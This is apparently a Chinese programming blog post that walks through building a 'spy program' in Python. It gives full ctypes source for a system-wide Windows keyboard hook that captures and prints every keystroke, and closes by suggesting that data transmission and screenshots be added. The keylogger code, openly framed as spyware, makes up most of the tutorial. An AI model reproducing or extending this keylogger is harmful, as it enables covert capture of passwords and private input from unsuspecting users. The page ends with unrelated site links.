使用Python打造一款间谍程序的流程分析


Posted in Python onFebruary 21, 2020

知识点

这次我们使用python来打造一款间谍程序

程序中会用到许多知识点,大致分为四块

win32API 此处可以在MSDN上查看

Python基础重点在cpytes库的使用,使用方法请点击此处

C语言基础

Hook

程序的基本原理在于通过注册Hook,记录系统事件

那么什么是Hook呢

Hook 技术又叫做钩子函数,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递

注册Hook时我们需要先导入DLL库,在Python中我们使用ctypes来导入,导入方法如下

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")

我们导入了user32.dll和kernel32.dll

这两个DLL有什么用处呢

user32.dll

是Windows用户界面相关应用程序接口,用于包括Windows处理,基本用户界面等特性,如创建窗口和发送消息

kernel32.dll

控制着系统的内存管理、数据的输入输出操作和中断处理

流程部分

知道了我们要使用什么样的工具,那么第一步应该怎么做呢

1.首先我们需要先注册Hook到系统上,通过user32.dll中的SetWindowsHookExA函数,我们可以在系统上注册钩子

HHOOK SetWindowsHookExA(
 int idHook,
 HOOKPROC lpfn,
 HINSTANCE hmod,
 DWORD dwThreadId
);

通过查看文档我们看到SetWindowsHookExA函数的参数及参数类型如上所示,详细文档点击此链接查看

通过文档我们看到第一个参数idHook中填入钩子的类型

WH_KEYBOARD_LL的常量值为13代表的意思是监视低级键盘输入事件,我们此处来监听键盘事件

第二个参数lpfn代表指向钩子过程的指针,要填入钩子过程(函数),我们可以在此处来添加额外代码达到我们想要达成的目的

第三个参数hmod表示为DLL句柄,我们可以使用kernel32中的GetModuleHandleW来获取句柄

最后一个参数dwThreadId我们填入0代表与同一桌面上所有的线程关联

代码如下

user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)

如何使用Python来编写我们的钩子过程呢,通过ctypes文档我们可以得知windows下使用WINFUNCTYPE来创建函数

此时我们发现有WINFUNCTYPE和CFUNCTYPE两个函数,具体要使用哪一个呢,这两个的区别为

WINFUNCTYPE

为Windows下独有的,通过使用使用stdcall调用约定的函数

CFUNCTYPE

 使用标准C调用约定的函数

HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

因为我们调用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL会使用LowLevelKeyboardProc回调函数,同时我们也需要在Python定义它

LowLevelKeyboardProc数据结构如下

LRESULT CALLBACK LowLevelKeyboardProc(
 _In_ int nCode,
 _In_ WPARAM wParam,
 _In_ LPARAM lParam
);

按照官方文档提示如果nCode小于零,则挂钩过程必须将消息传递给CallNextHookEx函数,而无需进一步处理,并且应返回CallNextHookEx返回的值

我们转换为Python代码

class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode', DWORD),
 ('scanCode', DWORD),
 ('flags', DWORD),
 ('time', DWORD),
 ('dwExtraInfo', DWORD)]

def hookProc(nCode, wParam, lParam):
 if nCode < 0:
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
 else:
 # 此处插入我们的代码
 pass
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

最后在我们退出程序时还需要删除Hook,不然大量的Hook会使系统运行缓慢,虽然在Windows 7及更高版本上,该钩子会被静默删除而不被调用。应用程序无法知道挂钩是否已删除。我们还是主动进行删除

删除需要使用user32.dll的UnhookWindowsHookEx,参数为Hook句柄

user32.UnhookWindowsHookEx(hooked)

下面贴上全部代码

import sys
from ctypes import *
from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode', DWORD),
 ('scanCode', DWORD),
 ('flags', DWORD),
 ('time', DWORD),
 ('dwExtraInfo', DWORD)]
def uninstallHookProc(hooked):
 if hooked is None:
 return
 user32.UnhookWindowsHookEx(hooked)
 hooked = None
def hookProc(nCode, wParam, lParam):
 if nCode < 0:
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
 else:
 if wParam == 256:
 if 162 == lParam.contents.value:
 print("Ctrl pressed, call Hook uninstall()")
 uninstallHookProc(hooked)
 sys.exit(-1)
 capsLock = user32.GetKeyState(20)
 # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
 if lParam.contents.value==13:
 print("\n")
 elif capsLock:
 print(chr(lParam.contents.value),end="")
 else:
 print(chr(lParam.contents.value+32),end="")
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
def startKeyLog():
 msg = MSG()
 user32.GetMessageA(byref(msg), 0, 0, 0)
def installHookProc(hooked, pointer):
 hooked = user32.SetWindowsHookExA(
 13,
 pointer,
 kernel32.GetModuleHandleW(),
 0
 )
 if not hooked:
 return False
 return True
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked, pointer):
 print("Hook installed")
 try:
 msg = MSG()
 user32.GetMessageA(byref(msg), 0, 0, 0)
 except KeyboardInterrupt as kerror:
 uninstallHookProc(hooked)
 print("Hook uninstall...")
else:
 print("Hook installed error")

贴上我们的效果图

使用Python打造一款间谍程序的流程分析

我们还可以再添加上额外的代码比如数据传输,截屏等等 ^_^

如何想要了解更多的只是请点击这里把 => 地址

总结

以上就是使用Python打造一款间谍程序的流程分析的详细内容,更多关于python间谍程序请关注三水点靠木其它相关文章!

Python 相关文章推荐
python命令行参数sys.argv使用示例
Jan 28 Python
Python实现文件按照日期命名的方法
Jul 09 Python
Python中的变量和作用域详解
Jul 13 Python
Python实现定时任务
Feb 08 Python
Python实现统计代码行的方法分析
Jul 12 Python
Python找出最小的K个数实例代码
Jan 04 Python
tensorflow 1.0用CNN进行图像分类
Apr 15 Python
Python+selenium 获取一组元素属性值的实例
Jun 22 Python
python实现QQ空间自动点赞功能
Apr 09 Python
Django model 中设置联合约束和联合索引的方法
Aug 06 Python
Python学习笔记之Zip和Enumerate用法实例分析
Aug 14 Python
Python进阶之使用selenium爬取淘宝商品信息功能示例
Sep 16 Python
python实现堆排序的实例讲解
Feb 21 #Python
Python中的sys.stdout.write实现打印刷新功能
Feb 21 #Python
Python控制台输出时刷新当前行内容而不是输出新行的实现
Feb 21 #Python
python编程进阶之异常处理用法实例分析
Feb 21 #Python
python编程进阶之类和对象用法实例分析
Feb 21 #Python
Python面向对象中类(class)的简单理解与用法分析
Feb 21 #Python
Python利用 utf-8-sig 编码格式解决写入 csv 文件乱码问题
Feb 21 #Python
You might like
通过php删除xml文档内容的方法
2015/01/23 PHP
PHP中捕获超时事件的方法实例
2015/02/12 PHP
PHP html_entity_decode()函数讲解
2019/02/25 PHP
thinkphp5框架实现数据库读取的数据转换成json格式示例
2019/10/10 PHP
php实现图片压缩处理
2020/09/09 PHP
JavaScript 小型打飞机游戏实现原理说明
2010/10/28 Javascript
js实时监听文本框状态的方法
2011/04/26 Javascript
jQuery的观察者模式详解
2014/12/22 Javascript
javascript实现炫酷的拖动分页
2015/05/11 Javascript
JavaScript中Cookies的相关使用教程
2015/06/04 Javascript
判断访客终端类型集锦
2015/06/05 Javascript
一个极为简单的requirejs实现方法
2016/10/20 Javascript
js实现日历与定时器
2017/02/22 Javascript
AngularJs实现聊天列表实时刷新功能
2017/06/15 Javascript
JS基于正则实现数字千分位用逗号分隔的方法
2017/06/16 Javascript
详解vue指令与$nextTick 操作DOM的不同之处
2018/08/02 Javascript
微信二次分享报错invalid signature问题及解决方法
2019/04/01 Javascript
Net微信网页开发 使用微信JS-SDK获取当前地理位置过程详解
2019/08/26 Javascript
three.js欧拉角和四元数的使用方法
2020/07/26 Javascript
关于better-scroll插件的无法滑动bug(2021通过插件解决)
2021/03/01 Javascript
python 字典中取值的两种方法小结
2018/08/02 Python
python的中异常处理机制
2018/08/30 Python
对python 生成拼接xml报文的示例详解
2018/12/28 Python
Pyqt QImage 与 np array 转换方法
2019/06/27 Python
Python字典深浅拷贝与循环方式方法详解
2020/02/09 Python
阿玛尼美妆俄罗斯官网:Giorgio Armani Beauty RU
2020/07/19 全球购物
支教自我鉴定
2014/01/18 职场文书
《云房子》教学反思
2014/04/20 职场文书
青奥会口号
2014/06/12 职场文书
MBA推荐信怎么写
2015/03/25 职场文书
交通事故起诉书
2015/05/19 职场文书
《西门豹》教学反思
2016/02/23 职场文书
2019年鼓励无偿献血倡议书
2019/09/17 职场文书
一看就懂的MySQL的聚簇索引及聚簇索引是如何长高的
2021/05/25 MySQL
微信小程序调用python模型
2022/04/21 Python
Python+DeOldify实现老照片上色功能
2022/06/21 Python